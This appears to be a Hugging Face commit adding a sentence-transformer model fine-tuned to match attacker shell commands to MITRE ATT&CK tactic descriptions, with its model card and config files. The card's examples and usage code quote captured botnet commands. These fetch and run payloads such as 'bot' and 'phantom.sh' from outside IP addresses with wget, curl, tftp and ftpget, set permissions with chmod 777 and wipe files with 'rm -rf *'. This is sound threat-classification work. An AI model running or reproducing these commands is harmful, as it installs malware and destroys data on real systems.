cebollet committed (verified)
Commit 59fa5ae · 1 Parent(s): c43b0ce

Add new SentenceTransformer model
1_Pooling/config.json ADDED
@@ -0,0 +1,10 @@
+ {
+   "word_embedding_dimension": 768,
+   "pooling_mode_cls_token": false,
+   "pooling_mode_mean_tokens": true,
+   "pooling_mode_max_tokens": false,
+   "pooling_mode_mean_sqrt_len_tokens": false,
+   "pooling_mode_weightedmean_tokens": false,
+   "pooling_mode_lasttoken": false,
+   "include_prompt": true
+ }
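This pooling configuration enables only `pooling_mode_mean_tokens`, so the sentence embedding is the mean of the token embeddings, with padding positions excluded via the attention mask. A minimal NumPy sketch of that computation (toy shapes; the real Pooling module runs on 768-dimensional MPNet outputs):

```python
import numpy as np

def mean_pool(token_embeddings: np.ndarray, attention_mask: np.ndarray) -> np.ndarray:
    """Masked mean pooling: average token vectors where the mask is 1."""
    mask = attention_mask[:, :, None].astype(token_embeddings.dtype)  # (batch, seq, 1)
    summed = (token_embeddings * mask).sum(axis=1)                    # (batch, dim)
    counts = np.clip(mask.sum(axis=1), 1e-9, None)                    # avoid divide-by-zero
    return summed / counts

# Two toy sequences of three tokens each, dim 4; the second has one padding token.
emb = np.arange(24, dtype=np.float64).reshape(2, 3, 4)
mask = np.array([[1, 1, 1], [1, 1, 0]])
pooled = mean_pool(emb, mask)
print(pooled.shape)  # (2, 4)
```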
README.md ADDED
@@ -0,0 +1,477 @@
+ ---
+ tags:
+ - sentence-transformers
+ - sentence-similarity
+ - feature-extraction
+ - generated_from_trainer
+ - dataset_size:212
+ - loss:CosineSimilarityLoss
+ base_model: sentence-transformers/all-mpnet-base-v2
+ widget:
+ - source_sentence: sh; enable; system; shell; /bin/busybox
+   sentences:
+   - "Defense Evasion: The adversary is trying to avoid being detected.\n\nDefense Evasion consists of techniques that adversaries use to avoid detection throughout their compromise. Techniques used for defense evasion include uninstalling/disabling security software or obfuscating/encrypting data and scripts. Adversaries also leverage and abuse trusted processes to hide and masquerade their malware. Other tactics’ techniques are cross-listed here when those techniques include the added benefit of subverting defenses. "
+   - "Defense Evasion: The adversary is trying to avoid being detected.\n\nDefense Evasion consists of techniques that adversaries use to avoid detection throughout their compromise. Techniques used for defense evasion include uninstalling/disabling security software or obfuscating/encrypting data and scripts. Adversaries also leverage and abuse trusted processes to hide and masquerade their malware. Other tactics’ techniques are cross-listed here when those techniques include the added benefit of subverting defenses. "
+   - "Lateral Movement: The adversary is trying to move through your environment.\n\nLateral Movement consists of techniques that adversaries use to enter and control remote systems on a network. Following through on their primary objective often requires exploring the network to find their target and subsequently gaining access to it. Reaching their objective often involves pivoting through multiple systems and accounts to gain. Adversaries might install their own remote access tools to accomplish Lateral Movement or use legitimate credentials with native network and operating system tools, which may be stealthier. "
+ - source_sentence: enable; ; system; ; shell; ; SH; ; /bin/busybox
+   sentences:
+   - "Persistence: The adversary is trying to maintain their foothold.\n\nPersistence consists of techniques that adversaries use to keep access to systems across restarts, changed credentials, and other interruptions that could cut off their access. Techniques used for persistence include any access, action, or configuration changes that let them maintain their foothold on systems, such as replacing or hijacking legitimate code or adding startup code. "
+   - "Privilege Escalation: The adversary is trying to gain higher-level permissions.\n\nPrivilege Escalation consists of techniques that adversaries use to gain higher-level permissions on a system or network. Adversaries can often enter and explore a network with unprivileged access but require elevated permissions to follow through on their objectives. Common approaches are to take advantage of system weaknesses, misconfigurations, and vulnerabilities. Examples of elevated access include: \n\n* SYSTEM/root level\n* local administrator\n* user account with admin-like access \n* user accounts with access to specific system or perform specific function\n\nThese techniques often overlap with Persistence techniques, as OS features that let an adversary persist can execute in an elevated context. "
+   - "Defense Evasion: The adversary is trying to avoid being detected.\n\nDefense Evasion consists of techniques that adversaries use to avoid detection throughout their compromise. Techniques used for defense evasion include uninstalling/disabling security software or obfuscating/encrypting data and scripts. Adversaries also leverage and abuse trusted processes to hide and masquerade their malware. Other tactics’ techniques are cross-listed here when those techniques include the added benefit of subverting defenses. "
+ - source_sentence: zlxx; enable; ; system; ; shell; ; sh; ; /bin/busybox
+   sentences:
+   - "Defense Evasion: The adversary is trying to avoid being detected.\n\nDefense Evasion consists of techniques that adversaries use to avoid detection throughout their compromise. Techniques used for defense evasion include uninstalling/disabling security software or obfuscating/encrypting data and scripts. Adversaries also leverage and abuse trusted processes to hide and masquerade their malware. Other tactics’ techniques are cross-listed here when those techniques include the added benefit of subverting defenses. "
+   - "Execution: The adversary is trying to run malicious code.\n\nExecution consists of techniques that result in adversary-controlled code running on a local or remote system. Techniques that run malicious code are often paired with techniques from all other tactics to achieve broader goals, like exploring a network or stealing data. For example, an adversary might use a remote access tool to run a PowerShell script that does Remote System Discovery. "
+   - "Persistence: The adversary is trying to maintain their foothold.\n\nPersistence consists of techniques that adversaries use to keep access to systems across restarts, changed credentials, and other interruptions that could cut off their access. Techniques used for persistence include any access, action, or configuration changes that let them maintain their foothold on systems, such as replacing or hijacking legitimate code or adding startup code. "
+ - source_sentence: cd /tmp; cd /var/run; cd /mnt; cd /root; cd /; wget http://89.110.99.68/bot; chmod 777 *; ./bot; cd /tmp; cd /var/run; cd /mnt; cd /root; cd /; wget http://89.110.99.68/bot; chmod 777 *; ./bot
+   sentences:
+   - "Resource Development: The adversary is trying to establish resources they can use to support operations.\n\nResource Development consists of techniques that involve adversaries creating, purchasing, or compromising/stealing resources that can be used to support targeting. Such resources include infrastructure, accounts, or capabilities. These resources can be leveraged by the adversary to aid in other phases of the adversary lifecycle, such as using purchased domains to support Command and Control, email accounts for phishing as a part of Initial Access, or stealing code signing certificates to help with Defense Evasion."
+   - "Privilege Escalation: The adversary is trying to gain higher-level permissions.\n\nPrivilege Escalation consists of techniques that adversaries use to gain higher-level permissions on a system or network. Adversaries can often enter and explore a network with unprivileged access but require elevated permissions to follow through on their objectives. Common approaches are to take advantage of system weaknesses, misconfigurations, and vulnerabilities. Examples of elevated access include: \n\n* SYSTEM/root level\n* local administrator\n* user account with admin-like access \n* user accounts with access to specific system or perform specific function\n\nThese techniques often overlap with Persistence techniques, as OS features that let an adversary persist can execute in an elevated context. "
+   - "Execution: The adversary is trying to run malicious code.\n\nExecution consists of techniques that result in adversary-controlled code running on a local or remote system. Techniques that run malicious code are often paired with techniques from all other tactics to achieve broader goals, like exploring a network or stealing data. For example, an adversary might use a remote access tool to run a PowerShell script that does Remote System Discovery. "
+ - source_sentence: cd /tmp; cd /var/run; cd /mnt; cd /root; cd /; wget http://74.48.108.226/phantom.sh; chmod 777 phantom.sh; sh phantom.sh; chmod 777 phantom.sh; sh phantom.sh; chmod 777 phantom2.sh; sh phantom2.sh; sh phantom1.sh; rm -rf phantom.sh phantom.sh phantom2.sh phantom1.sh; rm -rf *; curl -O http://74.48.108.226/phantom.sh; tftp 74.48.108.226 -c get phantom.sh; tftp -r phantom2.sh -g 74.48.108.226; ftpget -v -u anonymous -p anonymous -P 21 74.48.108.226 phantom1.sh phantom1.sh
+   sentences:
+   - "Reconnaissance: The adversary is trying to gather information they can use to plan future operations.\n\nReconnaissance consists of techniques that involve adversaries actively or passively gathering information that can be used to support targeting. Such information may include details of the victim organization, infrastructure, or staff/personnel. This information can be leveraged by the adversary to aid in other phases of the adversary lifecycle, such as using gathered information to plan and execute Initial Access, to scope and prioritize post-compromise objectives, or to drive and lead further Reconnaissance efforts."
+   - "Reconnaissance: The adversary is trying to gather information they can use to plan future operations.\n\nReconnaissance consists of techniques that involve adversaries actively or passively gathering information that can be used to support targeting. Such information may include details of the victim organization, infrastructure, or staff/personnel. This information can be leveraged by the adversary to aid in other phases of the adversary lifecycle, such as using gathered information to plan and execute Initial Access, to scope and prioritize post-compromise objectives, or to drive and lead further Reconnaissance efforts."
+   - "Privilege Escalation: The adversary is trying to gain higher-level permissions.\n\nPrivilege Escalation consists of techniques that adversaries use to gain higher-level permissions on a system or network. Adversaries can often enter and explore a network with unprivileged access but require elevated permissions to follow through on their objectives. Common approaches are to take advantage of system weaknesses, misconfigurations, and vulnerabilities. Examples of elevated access include: \n\n* SYSTEM/root level\n* local administrator\n* user account with admin-like access \n* user accounts with access to specific system or perform specific function\n\nThese techniques often overlap with Persistence techniques, as OS features that let an adversary persist can execute in an elevated context. "
+ pipeline_tag: sentence-similarity
+ library_name: sentence-transformers
+ ---
+
+ # SentenceTransformer based on sentence-transformers/all-mpnet-base-v2
+
+ This is a [sentence-transformers](https://www.SBERT.net) model finetuned from [sentence-transformers/all-mpnet-base-v2](https://huggingface.co/sentence-transformers/all-mpnet-base-v2). It maps sentences & paragraphs to a 768-dimensional dense vector space and can be used for semantic textual similarity, semantic search, paraphrase mining, text classification, clustering, and more.
+
+ ## Model Details
+
+ ### Model Description
+ - **Model Type:** Sentence Transformer
+ - **Base model:** [sentence-transformers/all-mpnet-base-v2](https://huggingface.co/sentence-transformers/all-mpnet-base-v2) <!-- at revision 12e86a3c702fc3c50205a8db88f0ec7c0b6b94a0 -->
+ - **Maximum Sequence Length:** 384 tokens
+ - **Output Dimensionality:** 768 dimensions
+ - **Similarity Function:** Cosine Similarity
+ <!-- - **Training Dataset:** Unknown -->
+ <!-- - **Language:** Unknown -->
+ <!-- - **License:** Unknown -->
+
+ ### Model Sources
+
+ - **Documentation:** [Sentence Transformers Documentation](https://sbert.net)
+ - **Repository:** [Sentence Transformers on GitHub](https://github.com/UKPLab/sentence-transformers)
+ - **Hugging Face:** [Sentence Transformers on Hugging Face](https://huggingface.co/models?library=sentence-transformers)
+
+ ### Full Model Architecture
+
+ ```
+ SentenceTransformer(
+   (0): Transformer({'max_seq_length': 384, 'do_lower_case': False}) with Transformer model: MPNetModel
+   (1): Pooling({'word_embedding_dimension': 768, 'pooling_mode_cls_token': False, 'pooling_mode_mean_tokens': True, 'pooling_mode_max_tokens': False, 'pooling_mode_mean_sqrt_len_tokens': False, 'pooling_mode_weightedmean_tokens': False, 'pooling_mode_lasttoken': False, 'include_prompt': True})
+   (2): Normalize()
+ )
+ ```
+
+ ## Usage
+
+ ### Direct Usage (Sentence Transformers)
+
+ First install the Sentence Transformers library:
+
+ ```bash
+ pip install -U sentence-transformers
+ ```
+
+ Then you can load this model and run inference.
+ ```python
+ from sentence_transformers import SentenceTransformer
+
+ # Download from the 🤗 Hub
+ model = SentenceTransformer("cebollet/fine-tuned-mitre-model")
+ # Run inference
+ sentences = [
+     'cd /tmp; cd /var/run; cd /mnt; cd /root; cd /; wget http://74.48.108.226/phantom.sh; chmod 777 phantom.sh; sh phantom.sh; chmod 777 phantom.sh; sh phantom.sh; chmod 777 phantom2.sh; sh phantom2.sh; sh phantom1.sh; rm -rf phantom.sh phantom.sh phantom2.sh phantom1.sh; rm -rf *; curl -O http://74.48.108.226/phantom.sh; tftp 74.48.108.226 -c get phantom.sh; tftp -r phantom2.sh -g 74.48.108.226; ftpget -v -u anonymous -p anonymous -P 21 74.48.108.226 phantom1.sh phantom1.sh',
+     'Reconnaissance: The adversary is trying to gather information they can use to plan future operations.\n\nReconnaissance consists of techniques that involve adversaries actively or passively gathering information that can be used to support targeting. Such information may include details of the victim organization, infrastructure, or staff/personnel. This information can be leveraged by the adversary to aid in other phases of the adversary lifecycle, such as using gathered information to plan and execute Initial Access, to scope and prioritize post-compromise objectives, or to drive and lead further Reconnaissance efforts.',
+     'Privilege Escalation: The adversary is trying to gain higher-level permissions.\n\nPrivilege Escalation consists of techniques that adversaries use to gain higher-level permissions on a system or network. Adversaries can often enter and explore a network with unprivileged access but require elevated permissions to follow through on their objectives. Common approaches are to take advantage of system weaknesses, misconfigurations, and vulnerabilities. Examples of elevated access include: \n\n* SYSTEM/root level\n* local administrator\n* user account with admin-like access \n* user accounts with access to specific system or perform specific function\n\nThese techniques often overlap with Persistence techniques, as OS features that let an adversary persist can execute in an elevated context. ',
+ ]
+ embeddings = model.encode(sentences)
+ print(embeddings.shape)
+ # [3, 768]
+
+ # Get the similarity scores for the embeddings
+ similarities = model.similarity(embeddings, embeddings)
+ print(similarities.shape)
+ # [3, 3]
+ ```
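`model.similarity` above computes cosine similarity (the `similarity_fn_name` configured for this model), and because the final Normalize module makes every embedding unit-length, that reduces to a dot product. A small NumPy sketch of the same computation, using toy 2-d vectors in place of real 768-d embeddings:

```python
import numpy as np

def cosine_matrix(a: np.ndarray, b: np.ndarray) -> np.ndarray:
    """Pairwise cosine similarity between rows of a and rows of b."""
    a_n = a / np.linalg.norm(a, axis=1, keepdims=True)
    b_n = b / np.linalg.norm(b, axis=1, keepdims=True)
    return a_n @ b_n.T

# Toy stand-ins for three embeddings (real ones come from model.encode).
emb = np.array([[1.0, 0.0], [0.0, 1.0], [1.0, 1.0]])
sims = cosine_matrix(emb, emb)
print(sims.shape)  # (3, 3)
```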
+
+ <!--
+ ### Direct Usage (Transformers)
+
+ <details><summary>Click to see the direct usage in Transformers</summary>
+
+ </details>
+ -->
+
+ <!--
+ ### Downstream Usage (Sentence Transformers)
+
+ You can finetune this model on your own dataset.
+
+ <details><summary>Click to expand</summary>
+
+ </details>
+ -->
+
+ <!--
+ ### Out-of-Scope Use
+
+ *List how the model may foreseeably be misused and address what users ought not to do with the model.*
+ -->
+
+ <!--
+ ## Bias, Risks and Limitations
+
+ *What are the known or foreseeable issues stemming from this model? You could also flag here known failure cases or weaknesses of the model.*
+ -->
+
+ <!--
+ ### Recommendations
+
+ *What are recommendations with respect to the foreseeable issues? For example, filtering explicit content.*
+ -->
+
+ ## Training Details
+
+ ### Training Dataset
+
+ #### Unnamed Dataset
+
+ * Size: 212 training samples
+ * Columns: <code>sentence_0</code>, <code>sentence_1</code>, and <code>label</code>
+ * Approximate statistics based on the first 212 samples:
+   | | sentence_0 | sentence_1 | label |
+   |:---|:---|:---|:---|
+   | type | string | string | float |
+   | details | <ul><li>min: 4 tokens</li><li>mean: 65.7 tokens</li><li>max: 384 tokens</li></ul> | <ul><li>min: 82 tokens</li><li>mean: 103.74 tokens</li><li>max: 153 tokens</li></ul> | <ul><li>min: 0.0</li><li>mean: 0.5</li><li>max: 1.0</li></ul> |
+ * Samples:
+   | sentence_0 | sentence_1 | label |
+   |:---|:---|:---|
+   | <code>sh; enable; klv1234; system; shell; echo "string" </code> | <code>Initial Access: The adversary is trying to get into your network.<br><br>Initial Access consists of techniques that use various entry vectors to gain their initial foothold within a network. Techniques used to gain a foothold include targeted spearphishing and exploiting weaknesses on public-facing web servers. Footholds gained through initial access may allow for continued access, like valid accounts and use of external remote services, or may be limited-use due to changing passwords.</code> | <code>0.0</code> |
+   | <code>sh; ping; sh; enable; system; shell; linuxshell; /bin/busybox</code> | <code>Lateral Movement: The adversary is trying to move through your environment.<br><br>Lateral Movement consists of techniques that adversaries use to enter and control remote systems on a network. Following through on their primary objective often requires exploring the network to find their target and subsequently gaining access to it. Reaching their objective often involves pivoting through multiple systems and accounts to gain. Adversaries might install their own remote access tools to accomplish Lateral Movement or use legitimate credentials with native network and operating system tools, which may be stealthier. </code> | <code>0.0</code> |
+   | <code>enable; ; linuxshell; ; system; ; sh; ; /bin/busybox</code> | <code>Privilege Escalation: The adversary is trying to gain higher-level permissions.<br><br>Privilege Escalation consists of techniques that adversaries use to gain higher-level permissions on a system or network. Adversaries can often enter and explore a network with unprivileged access but require elevated permissions to follow through on their objectives. Common approaches are to take advantage of system weaknesses, misconfigurations, and vulnerabilities. Examples of elevated access include: <br><br>* SYSTEM/root level<br>* local administrator<br>* user account with admin-like access <br>* user accounts with access to specific system or perform specific function<br><br>These techniques often overlap with Persistence techniques, as OS features that let an adversary persist can execute in an elevated context. </code> | <code>1.0</code> |
+ * Loss: [<code>CosineSimilarityLoss</code>](https://sbert.net/docs/package_reference/sentence_transformer/losses.html#cosinesimilarityloss) with these parameters:
+   ```json
+   {
+       "loss_fct": "torch.nn.modules.loss.MSELoss"
+   }
+   ```
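`CosineSimilarityLoss` with the configured `MSELoss` trains the model so that the cosine similarity of each embedding pair matches its gold label in [0, 1]. A minimal NumPy sketch of that objective on one batch (toy 2-d vectors stand in for real embeddings):

```python
import numpy as np

def cosine_similarity_loss(u: np.ndarray, v: np.ndarray, labels: np.ndarray) -> float:
    """MSE between row-wise cosine similarity and gold labels in [0, 1]."""
    cos = np.sum(u * v, axis=1) / (np.linalg.norm(u, axis=1) * np.linalg.norm(v, axis=1))
    return float(np.mean((cos - labels) ** 2))

u = np.array([[1.0, 0.0], [1.0, 1.0]])
v = np.array([[1.0, 0.0], [-1.0, 1.0]])
labels = np.array([1.0, 0.0])  # first pair similar, second dissimilar
loss = cosine_similarity_loss(u, v, labels)
print(round(loss, 4))  # 0.0 because cos values are exactly [1.0, 0.0]
```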
+
+ ### Training Hyperparameters
+ #### Non-Default Hyperparameters
+
+ - `per_device_train_batch_size`: 4
+ - `per_device_eval_batch_size`: 4
+ - `num_train_epochs`: 10
+ - `multi_dataset_batch_sampler`: round_robin
+
+ #### All Hyperparameters
+ <details><summary>Click to expand</summary>
+
+ - `overwrite_output_dir`: False
+ - `do_predict`: False
+ - `eval_strategy`: no
+ - `prediction_loss_only`: True
+ - `per_device_train_batch_size`: 4
+ - `per_device_eval_batch_size`: 4
+ - `per_gpu_train_batch_size`: None
+ - `per_gpu_eval_batch_size`: None
+ - `gradient_accumulation_steps`: 1
+ - `eval_accumulation_steps`: None
+ - `torch_empty_cache_steps`: None
+ - `learning_rate`: 5e-05
+ - `weight_decay`: 0.0
+ - `adam_beta1`: 0.9
+ - `adam_beta2`: 0.999
+ - `adam_epsilon`: 1e-08
+ - `max_grad_norm`: 1
+ - `num_train_epochs`: 10
+ - `max_steps`: -1
+ - `lr_scheduler_type`: linear
+ - `lr_scheduler_kwargs`: {}
+ - `warmup_ratio`: 0.0
+ - `warmup_steps`: 0
+ - `log_level`: passive
+ - `log_level_replica`: warning
+ - `log_on_each_node`: True
+ - `logging_nan_inf_filter`: True
+ - `save_safetensors`: True
+ - `save_on_each_node`: False
+ - `save_only_model`: False
+ - `restore_callback_states_from_checkpoint`: False
+ - `no_cuda`: False
+ - `use_cpu`: False
+ - `use_mps_device`: False
+ - `seed`: 42
+ - `data_seed`: None
+ - `jit_mode_eval`: False
+ - `use_ipex`: False
+ - `bf16`: False
+ - `fp16`: False
+ - `fp16_opt_level`: O1
+ - `half_precision_backend`: auto
+ - `bf16_full_eval`: False
+ - `fp16_full_eval`: False
+ - `tf32`: None
+ - `local_rank`: 0
+ - `ddp_backend`: None
+ - `tpu_num_cores`: None
+ - `tpu_metrics_debug`: False
+ - `debug`: []
+ - `dataloader_drop_last`: False
+ - `dataloader_num_workers`: 0
+ - `dataloader_prefetch_factor`: None
+ - `past_index`: -1
+ - `disable_tqdm`: False
+ - `remove_unused_columns`: True
+ - `label_names`: None
+ - `load_best_model_at_end`: False
+ - `ignore_data_skip`: False
+ - `fsdp`: []
+ - `fsdp_min_num_params`: 0
+ - `fsdp_config`: {'min_num_params': 0, 'xla': False, 'xla_fsdp_v2': False, 'xla_fsdp_grad_ckpt': False}
+ - `fsdp_transformer_layer_cls_to_wrap`: None
+ - `accelerator_config`: {'split_batches': False, 'dispatch_batches': None, 'even_batches': True, 'use_seedable_sampler': True, 'non_blocking': False, 'gradient_accumulation_kwargs': None}
+ - `deepspeed`: None
+ - `label_smoothing_factor`: 0.0
+ - `optim`: adamw_torch
+ - `optim_args`: None
+ - `adafactor`: False
+ - `group_by_length`: False
+ - `length_column_name`: length
+ - `ddp_find_unused_parameters`: None
+ - `ddp_bucket_cap_mb`: None
+ - `ddp_broadcast_buffers`: False
+ - `dataloader_pin_memory`: True
+ - `dataloader_persistent_workers`: False
+ - `skip_memory_metrics`: True
+ - `use_legacy_prediction_loop`: False
+ - `push_to_hub`: False
+ - `resume_from_checkpoint`: None
+ - `hub_model_id`: None
+ - `hub_strategy`: every_save
+ - `hub_private_repo`: None
+ - `hub_always_push`: False
+ - `gradient_checkpointing`: False
+ - `gradient_checkpointing_kwargs`: None
+ - `include_inputs_for_metrics`: False
+ - `include_for_metrics`: []
+ - `eval_do_concat_batches`: True
+ - `fp16_backend`: auto
+ - `push_to_hub_model_id`: None
+ - `push_to_hub_organization`: None
+ - `mp_parameters`: 
+ - `auto_find_batch_size`: False
+ - `full_determinism`: False
+ - `torchdynamo`: None
+ - `ray_scope`: last
+ - `ddp_timeout`: 1800
+ - `torch_compile`: False
+ - `torch_compile_backend`: None
+ - `torch_compile_mode`: None
+ - `include_tokens_per_second`: False
+ - `include_num_input_tokens_seen`: False
+ - `neftune_noise_alpha`: None
+ - `optim_target_modules`: None
+ - `batch_eval_metrics`: False
+ - `eval_on_start`: False
+ - `use_liger_kernel`: False
+ - `eval_use_gather_object`: False
+ - `average_tokens_across_devices`: False
+ - `prompts`: None
+ - `batch_sampler`: batch_sampler
+ - `multi_dataset_batch_sampler`: round_robin
+
+ </details>
+
+ ### Training Logs
+ | Epoch | Step | Training Loss |
+ |:------:|:----:|:-------------:|
+ | 9.4340 | 500 | 0.0526 |
+
+
+ ### Framework Versions
+ - Python: 3.11.13
+ - Sentence Transformers: 4.1.0
+ - Transformers: 4.52.4
+ - PyTorch: 2.6.0+cu124
+ - Accelerate: 1.7.0
+ - Datasets: 2.14.4
+ - Tokenizers: 0.21.1
+
+ ## Citation
+
+ ### BibTeX
+
+ #### Sentence Transformers
+ ```bibtex
+ @inproceedings{reimers-2019-sentence-bert,
+     title = "Sentence-BERT: Sentence Embeddings using Siamese BERT-Networks",
+     author = "Reimers, Nils and Gurevych, Iryna",
+     booktitle = "Proceedings of the 2019 Conference on Empirical Methods in Natural Language Processing",
+     month = "11",
+     year = "2019",
+     publisher = "Association for Computational Linguistics",
+     url = "https://arxiv.org/abs/1908.10084",
+ }
+ ```
+
+ <!--
+ ## Glossary
+
+ *Clearly define terms in order to be accessible across audiences.*
+ -->
+
+ <!--
+ ## Model Card Authors
+
+ *Lists the people who create the model card, providing recognition and accountability for the detailed work that goes into its construction.*
+ -->
+
+ <!--
+ ## Model Card Contact
+
+ *Provides a way for people who have updates to the Model Card, suggestions, or questions, to contact the Model Card authors.*
+ -->
config.json ADDED
@@ -0,0 +1,23 @@
+ {
+   "architectures": [
+     "MPNetModel"
+   ],
+   "attention_probs_dropout_prob": 0.1,
+   "bos_token_id": 0,
+   "eos_token_id": 2,
+   "hidden_act": "gelu",
+   "hidden_dropout_prob": 0.1,
+   "hidden_size": 768,
+   "initializer_range": 0.02,
+   "intermediate_size": 3072,
+   "layer_norm_eps": 1e-05,
+   "max_position_embeddings": 514,
+   "model_type": "mpnet",
+   "num_attention_heads": 12,
+   "num_hidden_layers": 12,
+   "pad_token_id": 1,
+   "relative_attention_num_buckets": 32,
+   "torch_dtype": "float32",
+   "transformers_version": "4.52.4",
+   "vocab_size": 30527
+ }
config_sentence_transformers.json ADDED
@@ -0,0 +1,10 @@
+ {
+   "__version__": {
+     "sentence_transformers": "4.1.0",
+     "transformers": "4.52.4",
+     "pytorch": "2.6.0+cu124"
+   },
+   "prompts": {},
+   "default_prompt_name": null,
+   "similarity_fn_name": "cosine"
+ }
model.safetensors ADDED
@@ -0,0 +1,3 @@
+ version https://git-lfs.github.com/spec/v1
+ oid sha256:96d563065765fde808d589bd5352b9ea957e68f98be729839538ed9462f5cc38
+ size 437967672
modules.json ADDED
@@ -0,0 +1,20 @@
+ [
+   {
+     "idx": 0,
+     "name": "0",
+     "path": "",
+     "type": "sentence_transformers.models.Transformer"
+   },
+   {
+     "idx": 1,
+     "name": "1",
+     "path": "1_Pooling",
+     "type": "sentence_transformers.models.Pooling"
+   },
+   {
+     "idx": 2,
+     "name": "2",
+     "path": "2_Normalize",
+     "type": "sentence_transformers.models.Normalize"
+   }
+ ]
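The modules listed here run in `idx` order: the Transformer produces token embeddings, Pooling averages them, and Normalize scales each sentence vector to unit length. A toy NumPy sketch of the two post-transformer stages (token embeddings assumed given, with no padding for simplicity):

```python
import numpy as np

def pool_and_normalize(token_embeddings: np.ndarray) -> np.ndarray:
    """Mean-pool token vectors (module 1), then L2-normalize (module 2)."""
    pooled = token_embeddings.mean(axis=1)                          # Pooling
    return pooled / np.linalg.norm(pooled, axis=1, keepdims=True)   # Normalize

tok = np.random.default_rng(0).normal(size=(2, 5, 8))  # (batch, seq, dim)
sent = pool_and_normalize(tok)
print(sent.shape)  # (2, 8)
```

Because of the Normalize stage, downstream cosine similarity on these vectors is simply a dot product.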
sentence_bert_config.json ADDED
@@ -0,0 +1,4 @@
+ {
+   "max_seq_length": 384,
+   "do_lower_case": false
+ }
special_tokens_map.json ADDED
@@ -0,0 +1,51 @@
+ {
+   "bos_token": {
+     "content": "<s>",
+     "lstrip": false,
+     "normalized": false,
+     "rstrip": false,
+     "single_word": false
+   },
+   "cls_token": {
+     "content": "<s>",
+     "lstrip": false,
+     "normalized": false,
+     "rstrip": false,
+     "single_word": false
+   },
+   "eos_token": {
+     "content": "</s>",
+     "lstrip": false,
+     "normalized": false,
+     "rstrip": false,
+     "single_word": false
+   },
+   "mask_token": {
+     "content": "<mask>",
+     "lstrip": true,
+     "normalized": false,
+     "rstrip": false,
+     "single_word": false
+   },
+   "pad_token": {
+     "content": "<pad>",
+     "lstrip": false,
+     "normalized": false,
+     "rstrip": false,
+     "single_word": false
+   },
+   "sep_token": {
+     "content": "</s>",
+     "lstrip": false,
+     "normalized": false,
+     "rstrip": false,
+     "single_word": false
+   },
+   "unk_token": {
+     "content": "[UNK]",
+     "lstrip": false,
+     "normalized": false,
+     "rstrip": false,
+     "single_word": false
+   }
+ }
tokenizer.json ADDED
The diff for this file is too large to render. See raw diff
 
tokenizer_config.json ADDED
@@ -0,0 +1,73 @@
+ {
+   "added_tokens_decoder": {
+     "0": {
+       "content": "<s>",
+       "lstrip": false,
+       "normalized": false,
+       "rstrip": false,
+       "single_word": false,
+       "special": true
+     },
+     "1": {
+       "content": "<pad>",
+       "lstrip": false,
+       "normalized": false,
+       "rstrip": false,
+       "single_word": false,
+       "special": true
+     },
+     "2": {
+       "content": "</s>",
+       "lstrip": false,
+       "normalized": false,
+       "rstrip": false,
+       "single_word": false,
+       "special": true
+     },
+     "3": {
+       "content": "<unk>",
+       "lstrip": false,
+       "normalized": true,
+       "rstrip": false,
+       "single_word": false,
+       "special": true
+     },
+     "104": {
+       "content": "[UNK]",
+       "lstrip": false,
+       "normalized": false,
+       "rstrip": false,
+       "single_word": false,
+       "special": true
+     },
+     "30526": {
+       "content": "<mask>",
+       "lstrip": true,
+       "normalized": false,
+       "rstrip": false,
+       "single_word": false,
+       "special": true
+     }
+   },
+   "bos_token": "<s>",
+   "clean_up_tokenization_spaces": false,
+   "cls_token": "<s>",
+   "do_lower_case": true,
+   "eos_token": "</s>",
+   "extra_special_tokens": {},
+   "mask_token": "<mask>",
+   "max_length": 128,
+   "model_max_length": 384,
+   "pad_to_multiple_of": null,
+   "pad_token": "<pad>",
+   "pad_token_type_id": 0,
+   "padding_side": "right",
+   "sep_token": "</s>",
+   "stride": 0,
+   "strip_accents": null,
+   "tokenize_chinese_chars": true,
+   "tokenizer_class": "MPNetTokenizer",
+   "truncation_side": "right",
+   "truncation_strategy": "longest_first",
+   "unk_token": "[UNK]"
+ }
vocab.txt ADDED
The diff for this file is too large to render. See raw diff